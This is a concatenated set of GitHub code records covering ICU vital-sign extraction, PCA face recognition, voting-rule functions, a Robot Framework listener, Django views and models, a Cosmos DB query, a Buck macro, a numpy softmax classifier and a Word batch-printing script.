\"\"\"\n\n return query\n\n def extract_vital_signs(self, patient_ids, parameter_ids, admission_date):\n query = self.get_vitalsign_query(patient_ids, parameter_ids)\n df = self.athena.query_as_pandas(query).drop_duplicates().reset_index(drop=True)\n df.sort_values('time', inplace=True)\n df['time_since_admission'] = (pd.to_datetime(df['time']) - datetime.strptime(admission_date, \"%Y-%m-%d %H:%M:%S.%f\")).dt.total_seconds() / 3600.0\n return df\n\n def all_vital_extract(self, patient_ids, parameter_ids, admission_date):\n column_mapping = {\n 3885: 'HR',\n 3888: 'Diastolic BP',\n 3887: 'Systolic BP',\n 5436: 'ABP Mean',\n 3951: 'SpO2',\n 4083: 'Respiratory rate',\n 3976: 'Temperature',\n 3910: 'Intra-Cranial Pressure'\n }\n\n\n for patient_id in patient_ids:\n query = self.get_vitalsign_query([patient_id], parameter_ids)\n df_query = self.athena.query_as_pandas(query).drop_duplicates().reset_index(drop=True)\n \n df_patient = pd.DataFrame(columns=['time'])\n\n for parameter_id in parameter_ids:\n df_parameter = df_query[df_query['parameterid'] == parameter_id]\n column_name = column_mapping.get(parameter_id, f'value_{parameter_id}')\n df_patient = pd.merge(df_patient, df_parameter[['time', 'value']], how='outer', on='time')\n df_patient.rename(columns={'value': column_name}, inplace=True)\n\n 
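 # the outer join on 'time' keeps every timestamp even when only some vitals were sampled; missing vitals become NaN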
df_patient.sort_values('time', inplace=True)\n df_patient['time_since_start'] = df_patient['time'] - df_patient['time'].iloc[0]\n\n # Convert the time difference to hours\n df_patient['time_since_start'] = df_patient['time_since_start'].dt.total_seconds() / 3600.0\n\n\n return df_patient\n\n \n \n def all_ABG_extract(self, patient_ids, parameter_ids, admission_date):\n column_mapping = {\n 8919: 'PaCo2',\n 11424: 'Potassium',\n 15166: 'Total Hb',\n 13053: 'Oxy Haemoglobin',\n 13054: 'Oxygen Saturation',\n 12347: 'Methaemoglobin',\n 8465: 'Carboxyhaemoglobin',\n 13670: 'PaO2',\n 8523: 'pH',\n 15825: 'Chloride',\n 12756: 'Sodium',\n 15824: 'Glucose',\n 7960: 'Calcium (Ionised)',\n 8527: 'pO2',\n 13188: 'ABG p50',\n 27391: 'Specimen Type',\n 10654: 'ABG Bicarbonate',\n 11763: 'ABG Lactate',\n 3997: 'Pulmonary Artery Pressure Mean',\n 7676: 'ABG Base Excess',\n 6904: 'ABG Anion Gap'\n }\n\n\n for patient_id in patient_ids:\n query = self.get_vitalsign_query([patient_id], parameter_ids)\n df_patient = pd.DataFrame(columns=['time'])\n df_query = self.athena.query_as_pandas(query).drop_duplicates().reset_index(drop=True)\n\n for parameter_id in parameter_ids:\n df_parameter = df_query[df_query['parameterid'] == parameter_id]\n column_name = column_mapping.get(parameter_id, f'value_{parameter_id}')\n df_patient = pd.merge(df_patient, df_parameter[['time', 'value']], how='outer', on='time')\n df_patient.rename(columns={'value': column_name}, inplace=True)\n\n df_patient.sort_values('time', inplace=True)\n\n # Calculate 'time since admission' for each 'time' value\n #admission_date = df_trauma.loc[df_trauma['patientid'] == patient_id, 'admissiondate'].iloc[0]\n df_patient['time_since_admission'] = (pd.to_datetime(df_patient['time']) - datetime.strptime(admission_date, \"%Y-%m-%d %H:%M:%S.%f\")).dt.total_seconds() / 3600.\n\n\n return df_patient\n \n \n def extract_12hr_vital(self, patient_ids, parameter_ids, admission_date):\n target_lower=1\n target_upper=13\n df1 = self.all_vital_extract(patient_ids, parameter_ids, admission_date)\n\n data_within_range = df1.loc[(df1['time_since_admission'] >= target_lower) & (df1['time_since_admission'] <= target_upper)]\n\n if not data_within_range.empty:\n df_result = data_within_range\n else:\n closest_to_lower = df1.loc[df1['time_since_admission'] >= target_lower, 'time_since_admission'].idxmin()\n closest_to_upper = df1.loc[df1['time_since_admission'] <= target_upper, 'time_since_admission'].idxmax()\n\n if abs(df1.loc[closest_to_lower, 'time_since_admission'] - target_lower) <= abs(df1.loc[closest_to_upper, 'time_since_admission'] - target_upper):\n start = closest_to_lower\n else:\n start = closest_to_upper\n\n time_range = pd.Timedelta(hours=12)\n end = start + time_range\n\n if end >= len(df1):\n df_result = df1.loc[start:]\n else:\n df_result = df1.loc[start:end]\n\n return df_result\n \n \n def extract_12hr_vital_new(self, patient_ids, parameter_ids, admission_date):\n target_lower = 1\n target_upper = 13\n df1 = self.all_vital_extract(patient_ids, parameter_ids, admission_date)\n\n if not df1.empty: # Check if the DataFrame is not empty\n data_within_range = df1.loc[(df1['time_since_admission'] >= target_lower) & (df1['time_since_admission'] <= target_upper)]\n\n if not data_within_range.empty:\n df_result = data_within_range\n else:\n closest_to_lower = df1.loc[df1['time_since_admission'] >= target_lower, 'time_since_admission'].idxmin()\n closest_to_upper = df1.loc[df1['time_since_admission'] <= target_upper, 'time_since_admission'].idxmax()\n\n if 
abs(df1.loc[closest_to_lower, 'time_since_admission'] - target_lower) <= abs(df1.loc[closest_to_upper, 'time_since_admission'] - target_upper):\n start = closest_to_lower\n else:\n start = closest_to_upper\n\n time_range = pd.Timedelta(hours=12)\n end = start + time_range\n\n if end >= len(df1):\n df_result = df1.loc[start:]\n else:\n df_result = df1.loc[start:end]\n else:\n df_result = pd.DataFrame(columns=['time', 'time_since_admission']) # Create an empty DataFrame\n\n return df_result\n","repo_name":"HasiUdayangi/Exploring-regulartory-factors-for-TBI-patients","sub_path":"vitalsign_extraction.py","file_name":"vitalsign_extraction.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72337292305","text":"# import the necessary packages\nfrom Face_Recognition_usingPCA.vectors_distance import Searcher\nfrom Face_Recognition_usingPCA.description import extract_features\nfrom mlxtend.image import extract_face_landmarks\nimport cv2\nimport imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# construct the argument parser and parse the arguments\nindexed_path = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recognition_usingPCA/features.csv\"\nquery_path = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recog/s\"\nresults_path = \"C:/Users/maiho/PycharmProjects/DPT/database\"\n\nimage = imageio.imread(query_path)\nimage = cv2.resize(image, (360, 540))\nprint(image.shape)\nlandmarks = extract_face_landmarks(image)\n# print(landmarks.shape)\n\nimg2 = image.copy()\n\nfig = plt.figure(figsize=(15, 5))\nax = fig.add_subplot(1, 3, 1)\nax.imshow(image)\nax = fig.add_subplot(1, 3, 2)\nax.scatter(landmarks[:, 0], -landmarks[:, 1], alpha=0.8)\nax = fig.add_subplot(1, 3, 3)\nfor idx,p in enumerate(landmarks):\n\timg2[p[1] - 3:p[1] + 3, p[0] - 3:p[0] + 3, :] = (255, 255, 255)\n\tcv2.putText(img2, str(idx), (p[0], p[1]), fontFace=cv2.FONT_HERSHEY_SCRIPT_SIMPLEX,\n\t\t\t\tfontScale=0.4,\n\t\t\t\tcolor=(0, 0, 255))\n\nax.imshow(img2)\nplt.show()\nfeatures = extract_features(image)\nnorm = np.linalg.norm(features)\nnormal_array = features/norm\nfrom sklearn.preprocessing import scale\n# features = scale( features, axis=0, with_mean=True, with_std=True, copy=True )\nprint(normal_array)\n\n# perform the search\nsearcher = Searcher(indexed_path)\nresults = searcher.search(normal_array)\n# display the query\n\ncv2.imshow(\"Query\", image)\ncv2.waitKey(0)\n# loop over the results\nfor (score, resultID) in results:\n\t# load the result image and display it\n\tprint(resultID)\n\tprint(\"=======\")\n\tprint(score)\n\tresult = cv2.imread(results_path + \"/\" + resultID)\n\tresult = cv2.resize(result, (500, 500))\n\tcv2.imshow(\"Result\", result)\n\tcv2.waitKey(0)\n","repo_name":"thangnvkcn/MultimediaDatabaseAssignment","sub_path":"Face_Recognition_usingPCA/face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71904651985","text":"from collections import Counter\n\ndef plurality(data, names, eliminations=[], standalone = False):\n \"\"\"\n Plurality voting\n input:\n data: list of lists of ints (voters' votes)\n names: dict of ints to strings (candidate names)\n eliminations: list of ints (candidates that have been eliminated)\n output:\n winners: list of ints (candidate(s) with most votes)\n losers: list of ints (candidate(s) with least votes)\n \"\"\"\n nr_votes = 
[0] * len(names)\n\n for ballot in data: # For each ballot\n for candidate in ballot: # For first eligible candidate in the vote\n if type(candidate) == list: # In case of Split vote\n result = tied_vote(candidate, eliminations)\n if result is None: # Both candidates were eliminated,\n continue # continue to next candidate in ballot\n for c in result:\n nr_votes[c] += 1/len(result) # Add weighted vote to one or both candidates\n break\n continue # Both candidates were eliminated, continue to next candidate\n if candidate not in eliminations:\n nr_votes[candidate] += 1 # Add vote to single candidate\n break\n\n # Find the winners and losers\n max_votes = max([i for i in nr_votes if nr_votes.index(i) not in eliminations]) # max(nr_votes) belongs to winner\n winners = [i for i in range(len(nr_votes)) if nr_votes[i] == max_votes] # Find index of winners\n \n # Find the losers\n min_votes = float(\"inf\") # Set min to infinity\n for idx, ballot in enumerate(nr_votes):\n if ballot < min_votes and idx not in eliminations and idx not in winners: # Lower than min, not eliminated and not a winner\n min_votes = ballot # Set new min\n\n # Eliminated if received min votes and not a winner\n losers = [i for i in range(len(nr_votes)) if nr_votes[i] == min_votes \n and i not in winners]\n\n if standalone:\n losers.extend(winners)\n return losers[::-1]\n \n return winners, losers\n\ndef STV(data, names, eliminations=[]):\n\n \"\"\"\n Single Transferable Vote\n input:\n data: list of lists of ints (voters' votes)\n names: dict of ints to strings (candidate names)\n eliminations: list of ints (candidates to be eliminated)\n \"\"\"\n winners, losers = plurality(data, names, eliminations)\n eliminations += losers # Add the eliminated candidates to the list of eliminations\n if len(losers) == 0: \n eliminations.extend(winners)\n return eliminations[::-1] # No more candidates to eliminate, final round\n return STV(data, names, eliminations) \n\ndef approval(data,names):\n \n nr_votes = [0] * len(names) # everyone starts with zero votes\n\n for ballot in data:\n for vote in ballot:\n nr_votes[vote] += 1 # everytime someone approved, they gain a vote\n\n return([x[1] for x in sorted(((value, index) for index, value in enumerate(nr_votes)), reverse=True)]) # return winner\n\ndef condorcet(data,names):\n\n candidate_wins = [[0 for i in range(len(names))] for j in range(len(names))] # start with empty matrix\n\n for i in names:\n for j in names[names.index(i)+1:]: # pairwise comparison of candidates\n if j == i:\n continue\n wins_i = 0\n wins_j = 0\n for ballot in data: # count wins against each other\n if i in ballot and j in ballot:\n if ballot.index(i) < ballot.index(j):\n wins_i += 1\n else:\n wins_j += 1\n elif i in ballot:\n wins_i += 1\n elif j in ballot:\n wins_j += 1 \n if wins_i > wins_j: # mark winner in matrix\n candidate_wins[i][j] = 1\n elif wins_i < wins_j:\n candidate_wins[j][i] = 1\n \n results = []\n i = 1\n while len(results) == 0 and i <= len(names)/2: \n for row in candidate_wins:\n if sum(row) == len(names) - i:\n results.append(candidate_wins.index(row)) \n i += 1\n\n return results \n\ndef borda(data, names):\n\n points = [0] * len(names) # empty list of points\n\n for ballot in data:\n for idx, vote in enumerate(ballot):\n points[vote] += len(names) - 1 - idx # give options n-1,n-2... 
points based on ranking\n\n return([x[1] for x in sorted(((value, index) for index, value in enumerate(points)), reverse=True)])\n\ndef copeland(data,names):\n\n score = [0] * len(names) # start with empty list\n\n for ballot in data: \n for idx, vote in enumerate(ballot): \n score[vote] += len(names) - 1 - 2*idx # increase score by how many they're above vs how many are ranked higher\n for i in names:\n if i not in ballot:\n score[i] -= len(ballot) # un voted for is tied bottom, subtract number above from score\n\n return([x[1] for x in sorted(((value, index) for index, value in enumerate(score)), reverse=True)])\n\ndef equalshares(projects):\n\n scores = []\n winners = []\n for idx in range(len(projects)):\n scores.append(projects[idx].cost/len(projects[idx].supporters))\n choice = scores.index(min(scores))\n while scores[choice] < 100000:\n if projects[choice].is_affordable():\n projects[choice].pick_in_equal_shares()\n winners.append(choice)\n scores[choice] = 100000\n choice = scores.index(min(scores))\n \n return winners","repo_name":"gracehon-backup/CompSocChoice","sub_path":"final/finalSCFs.py","file_name":"finalSCFs.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19941256304","text":"\"\"\"Robot framework library with listener.\"\"\"\n\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\nfrom robot.libraries.BuiltIn import BuiltIn\nfrom failurebase_sdk.client import FailurebaseClient\nfrom failurebase_sdk.utils import FailureSchema, TestSchema\n\n\nclass watcher:\n \"\"\"Robot Framework fail listener.\"\"\"\n\n ROBOT_LISTENER_API_VERSION = 2\n ROBOT_LIBRARY_SCOPE = \"GLOBAL\"\n\n def __init__(self):\n\n self.ROBOT_LIBRARY_LISTENER = self\n\n self.last_log = None\n self.client = None\n\n def initialize_failurebase(self, url: str, no_proxy: str, log_name: Path | str | None = None,\n log_level: int = logging.WARNING, encoding: str | None = None) -> None:\n \"\"\"Keyword to initialize \"\"\"\n\n if log_name is None:\n output_dir = BuiltIn().get_variable_value(\"${OUTPUT DIR}\")\n log_name = Path(output_dir) / 'failurebase.log'\n\n self.client = FailurebaseClient(url, no_proxy, log_name, log_level, encoding)\n\n def log_message(self, message: str) -> None:\n self.last_log = message\n\n def end_test(self, _, attrs) -> None:\n\n if attrs['status'] == 'FAIL':\n timestamp = self._change_format_of_timestamp(self.last_log.get('timestamp'))\n test = TestSchema(uid=attrs.get('longname'), file=attrs.get('source'), marks=attrs.get('tags'))\n fail = FailureSchema(test=test, message=attrs.get('message'), traceback=self.last_log.get('message'),\n timestamp=timestamp)\n\n self.client.log(fail.dump())\n\n @staticmethod\n def _change_format_of_timestamp(timestamp: str) -> str:\n ts_obj = datetime.strptime(timestamp, '%Y%m%d %H:%M:%S.%f')\n return datetime.strftime(ts_obj, '%Y-%m-%dT%H:%M:%S.%f')\n","repo_name":"marcinooo/failurebase_sdk","sub_path":"src/failurebase_sdk/robot/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73827567504","text":"from django.urls import path\nfrom .views import signup_view,activate,activation_sent_view\n\n\n\nurlpatterns = [\n\n path('signup/',signup_view,name='signup'),\n path('sent/',activation_sent_view,name='activation_sent'),\n 
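 # the route below captures the uidb64 and token path parameters consumed by activate()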
path('activate/<uidb64>/<token>/',activate,name='activate'),\n\n]\n\n#path('register/',SignUp.as_view(),name='register'),\n# Register","repo_name":"ChernoBen/hackathon","sub_path":"clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"30908359484","text":"from azure.cosmos import CosmosClient, exceptions\nimport os\nimport streamlit as st\n\n# Configure your Cosmos DB connection\nif os.getenv(\"Azure_Cosmos_EndPoint\"):\n endpoint = os.getenv(\"Azure_Cosmos_EndPoint\")\nelse:\n endpoint = st.secrets[\"Azure_Cosmos_EndPoint\"]\nif os.getenv(\"Azure_Cosmos_Key\"):\n key = os.getenv(\"Azure_Cosmos_Key\")\nelse:\n key = st.secrets[\"Azure_Cosmos_Key\"]\n\ndatabase_name = \"RealEstate\"\ncontainer_name = \"Properties\"\n\n# Initialize the Cosmos client\nclient = CosmosClient(endpoint, key)\n\n# Get a reference to the database\ndatabase = client.get_database_client(database_name)\n\n# Get a reference to the container\ncontainer = database.get_container_client(container_name)\n\n# Define a query; property names containing spaces need the c[\"...\"] bracket syntax\nquery = 'SELECT * FROM c WHERE c[\"Property Type\"] = \"Villa/House\"'\n\ntry:\n # Execute the query\n items = container.query_items(query, enable_cross_partition_query=True)\n\n # Process the query results\n for item in items:\n print(item)\n\nexcept exceptions.CosmosHttpResponseError as e:\n print(\"Error:\", e)\n","repo_name":"rbhattad31/RealEstateSalesGpt","sub_path":"Real_estate/Real_estate/CosmosDB.py","file_name":"CosmosDB.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25896617647","text":"load(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@fbcode_macros//build_defs:src_and_dep_helpers.bzl\", \"src_and_dep_helpers\")\nload(\"@fbcode_macros//build_defs:visibility.bzl\", \"get_visibility\")\nload(\"@fbcode_macros//build_defs:js_common.bzl\", \"js_common\")\n\ndef js_npm_module(\n name,\n srcs,\n node_module_name = None,\n deps = (),\n external_deps = (),\n visibility = None):\n \"\"\"\n Creates a javascript rule that points at a third-party library\n\n This rule copies all files in srcs into a directory based on `name`\n or `node_module_name`\n\n Args:\n name: The name of the rule to create. If `node_module_name` is not\n provided, this will be the name of the submodule underneath the\n genrule's output\n srcs: A list of files to copy into the output directory\n node_module_name: The name of the subdirectory to put all source files\n underneath.\n deps: A list of dependencies for this module. These should be\n javascript rules or genrules, as all files will be copied from\n the 'output' of these dependencies.\n external_deps: A list of `external_deps` style tuples. As with `deps`\n these should either be genrules or javascript rules.\n visibility: The visibility of this rule and created rules. 
Defaults\n                    to PUBLIC\n    \"\"\"\n\n    visibility = get_visibility(visibility, name)\n    platform = js_common.get_fbcode_platform()\n\n    # NPM modules package their listed sources.\n    root = paths.join(\"node_modules\", js_common.get_node_module_name(name, node_module_name))\n    out_srcs = [\n        (src, paths.join(root, src_and_dep_helpers.get_source_name(src)))\n        for src in sorted(srcs)\n    ]\n\n    js_common.generate_modules_tree(\n        name,\n        srcs = out_srcs,\n        deps = js_common.combine_deps(deps, external_deps, platform),\n        visibility = visibility,\n    )\n","repo_name":"elaa0505/buckit","sub_path":"infra_macros/fbcode_macros/build_defs/js_npm_module.bzl","file_name":"js_npm_module.bzl","file_ext":"bzl","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"24612535533","text":"import numpy as np\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n\ndef ONE_HOT(y,n_classes):\n    return np.eye(n_classes)[y]\n\n\n\ndef initial_parameters(L, layers):\n    \"\"\"\n    Initialize parameters.\n    Arguments:\n    ---------\n    L: total number of layers (input + hidden + output)\n    layers: number of units in each layer\n    Return:\n    ------\n    parameters: includes weights and biases.\n    \"\"\"\n    np.random.seed(1)\n    parameters = {}\n    V = {}\n    M = {}\n    for l in range(L - 1):\n        W = np.random.randn(layers[l], layers[l + 1]) / np.sqrt(layers[l])\n        b = np.zeros((1, layers[l + 1]))\n\n        V['V_dW' + str(l + 1)] = np.zeros(W.shape)\n        V['V_db' + str(l + 1)] = np.zeros(b.shape)\n        M['M_dW' + str(l + 1)] = np.zeros(W.shape)\n        M['M_db' + str(l + 1)] = np.zeros(b.shape)\n        parameters['W' + str(l + 1)] = W\n        parameters['b' + str(l + 1)] = b\n\n    return parameters, V, M\n\ndef relu(Z):\n    \"\"\"\n    ReLU activation\n    \"\"\"\n    return np.maximum(0,Z)\n\ndef softmax(Z):\n    \"\"\"\n    softmax activation\n    \"\"\"\n    t = np.exp(Z)\n    return t/np.sum(t,axis=1,keepdims=True)\n\ndef forward(X,L,parameters):\n    \"\"\"\n    forward propagation\n    \"\"\"\n    A = X\n    cache = {'A0':X}\n    for l in range(L-1):\n        W = parameters['W'+str(l+1)]\n        b = parameters['b'+str(l+1)]\n        Z = np.add(np.dot(A,W),b)\n        cache['Z'+str(l+1)] = Z\n        if l != L -2 :\n            A = relu(Z)\n        else:\n            A = softmax(Z)\n        cache['A'+str(l+1)] = A\n    return A,cache\n\ndef Loss(A,y):\n    \"\"\"\n    Calculate the loss value on mini-batches or scoring data.\n    \"\"\"\n    m = y.shape[0]\n    loss = - np.sum(np.multiply(y,np.log(A))) / m\n    return loss\n\n\ndef backward(A, y, cache, parameters, L):\n    \"\"\"\n    Backward propagation\n    \"\"\"\n    m = y.shape[0]\n    dparameters = {}\n    for l in range(L - 1, 0, -1):\n        if l == L - 1:\n            dZ = A - y\n            dW = np.dot(cache['A' + str(l - 1)].T, dZ) / m\n            db = np.sum(dZ, axis=0, keepdims=True) / m\n        else:\n            dA = np.dot(dZ, parameters['W' + str(l + 1)].T)\n            dZ = np.multiply(dA, np.int64(cache['Z' + str(l)] > 0))\n            A = cache['A' + str(l - 1)]\n            dW = np.dot(A.T, dZ) / m\n            db = np.sum(dZ, axis=0, keepdims=True) / m\n        dparameters['dW' + str(l)] = dW\n        dparameters['db' + str(l)] = db\n\n    return dparameters\n\n\ndef Update(L, dparameters, parameters, V, M, beta_1, beta_2, t, lr, epsilon=1e-8):\n    \"\"\"\n    Update parameters using the Adam optimizer.\n    \"\"\"\n    for l in range(L - 1):\n        M['M_dW' + str(l + 1)] = beta_1 * M['M_dW' + str(l + 1)] + (1 - beta_1) * dparameters['dW' + str(l + 1)]\n        M['M_db' + str(l + 1)] = beta_1 * M['M_db' + str(l + 1)] + (1 - beta_1) * dparameters['db' + str(l + 1)]\n\n        V['V_dW' + str(l + 1)] = beta_2 * V['V_dW' + str(l + 1)] + (1 - beta_2) * np.square(\n            dparameters['dW' + str(l + 1)])\n        V['V_db' + str(l + 1)] = beta_2 * 
V['V_db' + str(l + 1)] + (1 - beta_2) * np.square(\n            dparameters['db' + str(l + 1)])\n\n        M_correct_dW = M['M_dW' + str(l + 1)] / (1 - np.power(beta_1, t))\n        M_correct_db = M['M_db' + str(l + 1)] / (1 - np.power(beta_1, t))\n\n        V_correct_dW = V['V_dW' + str(l + 1)] / (1 - np.power(beta_2, t))\n        V_correct_db = V['V_db' + str(l + 1)] / (1 - np.power(beta_2, t))\n\n        parameters['W' + str(l + 1)] -= lr * M_correct_dW / (np.sqrt(V_correct_dW + epsilon))\n        parameters['b' + str(l + 1)] -= lr * M_correct_db / (np.sqrt(V_correct_db + epsilon))\n\n    return parameters, V, M\n\n\ndef random_mini_batchs(X, y, seed, batc_size=64):\n    \"\"\"\n    Create mini-batches.\n    \"\"\"\n    np.random.seed(seed)  # make sure the data is shuffled differently every epoch.\n\n    m = X.shape[0]\n    mini_batchs = []\n\n    index_ = np.random.permutation(m)\n\n    shuffle_X = X[index_, :]\n    shuffle_y = y[index_, :]\n\n    num_compute_minibatch_size = m // batc_size\n    for i in range(num_compute_minibatch_size):\n        mini_x = shuffle_X[i * batc_size:(i + 1) * batc_size, :]\n\n        mini_y = shuffle_y[i * batc_size:(i + 1) * batc_size, :]\n        mini_batch = (mini_x, mini_y)\n        mini_batchs.append(mini_batch)\n\n    if m % batc_size != 0:\n        mini_x = shuffle_X[num_compute_minibatch_size * batc_size:, :]\n        mini_y = shuffle_y[num_compute_minibatch_size * batc_size:, :]\n        mini_batch = (mini_x, mini_y)\n        mini_batchs.append(mini_batch)\n\n    return mini_batchs\n\ndef score(data,labels,L,parameters,is_loss=False):\n    \"\"\"\n    Score the model and return the accuracy and, optionally, the loss value.\n    \"\"\"\n    m = labels.shape[0]\n    A,_ = forward(data,L,parameters)\n    predict_y = np.argmax(A,axis=1)\n    true_y = np.argmax(labels,axis=1)\n    acc = np.equal(true_y,predict_y).sum() / m\n    if is_loss:\n        loss = Loss(A,labels)\n        return acc,loss\n    else:\n        return acc\n\n\ndef Softmax_Model(layers, data, labels, val_data, val_labels, lr, epochs, beta_1=0.9, beta_2=0.999, batc_size=64,\n                  save_path=None,lock=None):\n    \"\"\"\n    Implement softmax model.\n    NN model: Linear(25) ---> Linear(12) ---> Linear(10)\n    \"\"\"\n\n    if not os.path.exists(save_path):\n        os.mkdir(save_path)\n\n    SON_PATH = save_path + str(np.round(lr, 4)) + '/'\n    if not os.path.exists(SON_PATH):\n        os.mkdir(SON_PATH)\n\n\n    layers.insert(0, data.shape[1])\n    L = len(layers)\n    n_classes = len(np.unique(labels))\n    y_train_hot = ONE_HOT(labels, n_classes)\n    y_val_hot = ONE_HOT(val_labels, n_classes)\n    seed = 0\n    t = 0\n    losses = []\n    val_losses = []\n    acc_trains = []\n    acc_vals = []\n\n    parameters, V, M = initial_parameters(L, layers)\n\n\n    for epoch in range(epochs):\n        seed += 1\n        mini_batchs = random_mini_batchs(data, y_train_hot, seed=seed, batc_size=batc_size)\n        for mini_x, mini_y in mini_batchs:\n            t += 1\n            A, cache = forward(mini_x, L, parameters)\n            dparameters = backward(A, mini_y, cache, parameters, L)\n            parameters, V, M = Update(L, dparameters, parameters, V, M, beta_1, beta_2, t, lr)\n\n        acc_train, train_loss = score(data, y_train_hot, L, parameters, True)\n        acc_val, val_loss = score(val_data, y_val_hot, L, parameters, True)\n\n        losses.append(train_loss)\n        val_losses.append(val_loss)\n        acc_trains.append(acc_train)\n        acc_vals.append(acc_val)\n\n        print('[{}/{}] loss:{:.4f},acc_train:{:.4f},val_loss:{:.4f},acc_val:{:.4f}'.format(epoch + 1,\n                                                                                           epochs,\n                                                                                           train_loss,\n                                                                                           acc_train,\n                                                                                           val_loss,\n                                                                                           acc_val))\n\n        FULL_PATH_TXT = SON_PATH + 'log.txt'\n        with lock:\n            with open(FULL_PATH_TXT,mode='a') as f:\n                WRITE = '[{}/{}] loss:{:.4f},acc_train:{:.4f},val_loss:{:.4f},acc_val:{:.4f}\\n'.format(epoch + 1,\n                                                                                                       epochs,\n                                                                                                       train_loss,\n                                                                                                       acc_train,\n                                                                                                       val_loss,\n                                                                                                       acc_val)\n                
f.write(WRITE)\n                f.flush()\n\n\n\n\n    return losses, val_losses, acc_trains, acc_vals, parameters,SON_PATH\n\n\n\n\n","repo_name":"Heyra-Joker/Deep-Learning","sub_path":"04 Improving-Deep-Neural-Networks/03 TuningProcessSoftmaxBatchNormalization/1.1 SearchingParameters/Softmax.py","file_name":"Softmax.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"74018584144","text":"import win32com.client as win32 \nimport os\nimport time\n\ncurrentPath = os.getcwd()\n\nprint(\"    _         _        ____       _       _   \")\nprint(\"   / \\ _   _| |_ ___  |  _ \\ _ __(_)_ __ | |_ \")\nprint(\"  / _ \\| | | | __/ _ \\ | |_) | '__| | '_ \\| __|\")\nprint(\" / ___ \\ |_| | || (_) ||  __/| |  | | | | | |_ \")\nprint(\"/_/   \\_\\__,_|\\__\\___/ |_|   |_|  |_|_| |_|\\__|  @LKBrilliant\")\nprint(\"Print multiple copies of a one page MS Word document with a unique ID on each page.\")\nprint(\"The Word document must have a 'bookmark' named 'ID' where the unique ID needs to be placed.\")\nprint(\"Compatible MS Word format: .doc\")\nprint(\"Quit: Ctrl+c\\\\n\")\n\nwhile True:\n    try:\n        docName = input(\"Name of the Document: \")\n        if not os.path.isfile(\"{}.doc\".format(docName)):\n            print(\"{}.doc is not in this directory\".format(docName))\n        else: break\n    except KeyboardInterrupt:\n        print(\"\\\\nQuitting...\")\n        exit()\nwhile True:\n    try:\n        numPrints = int(input(\"Number of prints: \"))\n        break\n    except ValueError:\n        print(\"Enter a valid answer!\")\n    except KeyboardInterrupt:\n        print(\"\\\\nQuitting...\")\n        exit()\nwhile True:\n    try:\n        ID = int(input(\"Starting ID: \"))\n        break\n    except ValueError:\n        print(\"Enter a valid answer!\")\n    except KeyboardInterrupt:\n        print(\"\\\\nQuitting...\")\n        exit()\n\nprint(\"Sending documents to print...\")\nwhile numPrints >= 1:\n    wordApp = win32.gencache.EnsureDispatch('Word.Application')\n    wordApp.Visible = False\n    doc = wordApp.Documents.Open(\"{}\\\\{}.doc\".format(currentPath, docName))\n    rng = doc.Bookmarks(\"ID\").Range  # A bookmark is placed where the changes need to happen\n    rng.InsertAfter(\"{:02d}\".format(ID))\n    doc.PrintOut()\n    rng.Delete()\n    doc.Save()  # Save the document, otherwise MS Word will prompt a message to save\n    wordApp.Quit()\n    time.sleep(3)\n    numPrints -= 1\n    ID += 1 \nprint(\"Done\")\n\n","repo_name":"LKbrilliant/Auto-Print","sub_path":"autoPrint.py","file_name":"autoPrint.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24457790513","text":"from django.db import models\nfrom django.contrib.auth.models import User, Group\n\n\nclass Currency(models.Model):\n    name = models.CharField(max_length=3)\n    symbol = models.CharField(max_length=1, null=True, blank=True)\n    value_in_eur = models.DecimalField(decimal_places=2, max_digits=10)\n\n    class Meta:\n        verbose_name = 'currency'\n        verbose_name_plural = 'currencies'\n\n    def __str__(self):\n        return \"{} ({})\".format(self.name, self.symbol)\n\nclass Expense(models.Model):\n    name = models.CharField(max_length=50)\n    origin = models.ForeignKey(User, on_delete=models.PROTECT)\n    group = models.ForeignKey(Group, on_delete=models.PROTECT)\n    description = models.TextField(blank=True)\n    value = models.DecimalField(decimal_places=2, max_digits=10)\n    currency = models.ForeignKey(Currency, on_delete=models.PROTECT)\n    date = models.DateField(blank=True)\n\n    def __str__(self):\n        return \"{}-{} ({}) {} {}\".format(self.group, self.name, self.origin, self.value, 
